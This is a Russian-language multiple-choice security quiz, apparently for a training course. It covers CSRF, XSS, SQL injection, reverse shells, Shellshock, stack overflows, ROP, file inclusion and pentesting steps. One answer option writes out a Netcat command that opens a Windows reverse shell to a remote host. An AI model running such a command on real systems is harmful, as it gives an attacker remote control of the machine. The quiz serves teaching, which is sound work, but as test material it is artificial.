NEW
Font size
Worksheets1-46
Total questions: 46
Worksheet time: 23mins
Что такое CSRF-атака?
Эксплуатация ошибки сериализации
Анализ SQL-запросов
Атака, в которой злоумышленник заставляет браузер жертвы выполнить нежелательный запрос
Атака, подменяющая DNS-запросы
Перехват трафика по ARP
Основная цель XSS-атаки:
Внедрение и выполнение произвольного JavaScript-кода в браузере
Перехват ARP-трафика
Модификация заголовков TCP
Фильтрация IP-трафика
Взлом MAC-адресов
Какой тип SQL-инъекции показывает ошибки SQL-сервера?
Error-based SQLi
Union-based SQLi
Boolean-based SQLi
Time-based SQLi
Blind-based SQLi
Что такое Reverse Shell?
Инструмент фильтрации пакетов
Перехват ARP-пакетов
Подключение от атакуемой машины к атакующей системе
Локальный запуск команд
Утилита для логирования клавиш
Суть Race Condition уязвимости:
Неверная проверка входных данных
Два процесса обращаются к ресурсу одновременно
Ошибка в SQL-синтаксисе
Утечка содержимого cookies
Неправильная настройка firewall
Что делает ARP Poison?
Сканирует порты
Перехватывает HTTP cookies
Подменяет MAC-адрес в таблицах ARP
Впрыскивает SQL-код
Проводит XSS-атаку
Основная цель SQLMap:
Анализ XSS-скриптов
Брутфорс SSH
Автоматизация SQL-инъекций
Создание ARP reply
Перехват сетевых пакетов
В чем опасность Stored XSS?
Код выполняется один раз у жертвы
Код искажается фильтрами
Код выполняется только на сервере
Код не выполняется без Cookies
Код сохраняется в базе и выполняется у всех пользователей
Что делает кейлоггер?
Записывает нажатия клавиш
Проверяет целостность диска
Шифрует сетевой трафик
Перехватывает ARP-запросы
Определяет SQL-инъекции
Что делает backdoor?
Отображает заголовки ответов
Фильтрует ICMP-пакеты
Позволяет получить скрытый доступ к системе
Проверяет права доступа
Очищает ARP-таблицы
Что обозначает бит Set-UID у исполняемого файла в UNIX/Linux?
Файл становится только для чтения и в UNIX/Linux системах становится невидимым.
При запуске программа получает эффективный UID владельца файла.
Программа запускается в фоновом режиме (daemon).
Программа выполняется только от root.
Файл автоматически шифруется.
Что такое EUID (effective UID) процесса?
Размер стека процесса для эффективной реализации.
Идентификатор пользователя в /etc/passwd.
Идентификатор, по которому система определяет привилегии процесса.
IP-адрес пользователя.
Идентификатор группы процесса, по которому система определяет владельца группы.
Что следует сделать перед понижением привилегий, чтобы избежать утечки возможностей?
Остановить все демоны.
Закрыть ненужные файловые дескрипторы (close).
Создать новую учетную запись root и удалить все записи о пользователях в системе в файле /etc/passwd.
Удалить все записи о пользователях в системе из файла /etc/passwd.
Отключить сеть.
Как новый процесс получает переменные окружения?
Автоматически из сетевых настроек.
Из файла /boot/config при завершении текущего процесса.
Через наследование от родителя при fork() и execve().
Путём компиляции программы.
Через драйверы ядра из файла /boot/config при завершении текущего процесса.
Какой аргумент функции main в C содержит указатель на массив переменных окружения?
Stdout
Argc
Stdin
Argv
Envp
Какая разница между shell variables и environment variables?
Shell variables хранятся в файле /etc/passwd, environment variables хранятся в файле /etc/shadow.
Все environment variables наследуются дочерними процессами, shell variables – нет.
Environment variables исчезают при перезагрузки.
Environment variables видны только root.
Shell variables изменяются только через BIOS.
Где можно увидеть переменные окружения процесса в Linux?
В /var/log/environ
В /etc/log/environ.conf
В /etc/log/env
В /proc/environ
В /usr/bin/environ
Какая команда веб-клиента используется в презентации, чтобы подставить произвольный User-Agent?
wget -uH ".."
curl -A ".."
curl -H ".."
curl -U ".."
wget --ua ".."
Какие два условия необходимы для эксплуатации Shellshock?
Процесс должен работать в режиме отладки и иметь открытую SSH-сессию.
На машине должен быть установлен Perl и отключен режим Shellshock.
Нужен доступ к BIOS и отключен режим Shellshock.
Клиент должен работать по протоколу RDP и иметь root-доступ к удалённому хосту.
Процесс должен запускать bash и получать ненадёжные данные через переменные окружения.
Что такое стек (stack) процесса?
Пул потоков ОС, где хранятся адрес возврата и saved registers.
Буфер в сетевом адаптере для пакетов, где хранятся локальные переменные.
Область памяти, где хранятся локальные переменные, адрес возврата и saved registers.
Постоянное хранилище файлов на диске, где хранятся локальные переменные и адрес возврата.
Раздел ядра для драйверов, где хранятся локальные переменные, адрес возврата и saved registers.
Что может произойти при перезаписи адреса возврата на стеке?
Увеличение скорости выполнения программы.
Сжатие стека и увеличение скорости выполнения программы.
Передача управления по произвольному адресу.
Переход в безопасный режим ОС и сжатие стека.
Автоматическое восстановление исходного кода.
Какой эффект даёт компиляция с «-z execstack» (в учебной среде)?
Делает стек исполняемым.
Шифрует исполняемый файл в стеке.
Отключает вывод в консоль из стека.
Включает автоматическое рандомизированное выравнивание в стеке.
Включает строгую проверку типов в стеке.
Какое поведение предотвращает защита «non-executable stack (NX)»?
Запись из стека в лог-файлы.
Отключает отправку ICMP-пакетов через стек для записи в лог-файлы.
Выполнение кода, расположенного в области стека.
Чтение с сетевого сокета в стек и запись в сетевой сокет.
Установление соединения TCP с помощью стека для чтения и записи. Какая команда GNU Debugger предлагается для получения адреса system()?
run /bin/sh/address
disassemble system
set env SYSTEM
p system
info address
Как называется обобщённая техника, которая связывает множество коротких фрагментов кода (gadgets)?
Stack-Oriented Scripting (SOS)
Return-Oriented Programming (ROP)
Heap-Object Chaining (HOC)
Direct Kernel Injection (DKI)
Function Hooking Protocol (FHP)
Что является основной целью пентестинга веб-приложений?
Поиск уязвимостей до их использования злоумышленниками
Измерение скорости загрузки страниц
Тестирование пользовательского интерфейса
Оптимизация сетевых соединений
Повышение производительности сайта
Какой инструмент чаще всего используется для тестирования безопасности HTTP-запросов?
OpenSSL
Visual Studio Code
Burp Suite
Cisco Packet Tracer
Wireshark
Что входит в первый этап веб-пентеста?
Подготовка отчёта
Анализ уязвимостей сервера
Сбор и разведка информации о цели
Эксплуатация найденных ошибок
Уничтожение логов
Какой протокол является основной целью при проверке безопасности сайтов?
SSH
SMTP
SNMP
FTP
HTTP
Что такое Remote Code Execution (RCE)?
Ошибка при загрузке файла
Возможность выполнить произвольный код на удалённом сервере
Инъекция SQL-запроса
Неправильная обработка HTML
Встраивание внешнего API
В каком языке чаще всего встречаются RCE-уязвимости из-за динамической интерпретации?
Java
PHP
Go
Kotlin
HTML
Какое действие помогает снизить риск RCE?
Использование HTTPS
Кэширование страниц
Очистка и фильтрация пользовательского ввода
Хеширование паролей
Обновление браузера
Что описывает обратное TCP-соединение (Reverse TCP)?
Временный туннель между узлами
Клиент подключается к серверу
Соединение с использованием UDP
Двустороннее зашифрованное соединение
Сервер подключается обратно к атакующему
Какой инструмент используется для создания и управления обратными TCP-сеансами?
cURL
Nikto
Nmap
Wireshark
Metasploit
Что происходит после успешного установления обратного TCP-сеанса?
Атакующий получает удалённую оболочку
Выполняется SQL-инъекция
Устанавливается VPN-туннель
Сервер закрывает соединение
Система автоматически перезапускается
Что представляет собой уязвимость загрузки файлов?
Возможность загрузки вредоносного файла на сервер
Потеря соединения с клиентом
Ошибка при передаче данных через FTP
Недоступность сервера из-за большого файла
Ошибка при валидации пароля
Какой файл чаще используется злоумышленником для эксплуатации File Upload уязвимости?
.php
.jpg
.xml
.html
.gif
Какой метод эффективнее предотвращает уязвимость загрузки файлов?
Ограничение размера файлов
Запись логов сервера
Сжатие загружаемых данных
Использование HTTPS
Проверка MIME-типа и пути сохранения
Что характеризует LFI (Local File Inclusion)?
Внедрение SQL-запросов в HTML
Перенаправление на внешний ресурс
Включение локальных файлов с сервера в веб-страницу
Открытие порта сервера
Ошибка при загрузке библиотеки
Что характеризует RFI (Remote File Inclusion)?
Подключение удалённого файла по URL
Подключение локального файла
Ошибка HTTP-заголовков
Встраивание SQL-запроса
Уязвимость в JavaScript
Какова основная цель итогового отчёта пентеста?
Анализ скорости отклика сайта
Сокрытие следов атак
Демонстрация уровня взлома
Сравнение с конкурентами
Подробное описание найденных уязвимостей и способов их устранения
Какой шаг рекомендуется после завершения пентеста?
Провести повторный пентест немедленно
Передать результаты владельцу сайта для исправления
Сменить IP-адрес
Опубликовать найденные уязвимости
Удалить все файлы
Какая команда Netcat используется для запуска обратной оболочки в Windows?
nc -e cmd.exe 10.0.0.1 4444
nc -zv 10.0.0.1 80
nc -listen 80
nc -lvp 4444
nc -t 4444 -r
Какой тип уязвимости чаще всего позволяет добиться RCE при неверной обработке пользовательских данных?
HTML Injection
XSS
Command Injection
SQL Injection
CSRF
Какой набор инструментов чаще всего используется при веб-пентестинге?
Nmap, FileZilla, Paint
Metasploit, Burp Suite, Nikto
GIMP, Netcat, GitHub
Wireshark, WordPress, Python
Firefox, Excel, VS Code
Какая из следующих практик не поможет предотвратить CSRF?
Проверка заголовков Origin/Referer при критичных операциях
Применение SameSite=Strict для важных cookie
Публичное раскрытие секретного ключа приложения
Использование уникальных CSRF-токенов в формах
Выполнение критичных действий только по POST и с проверкой токена
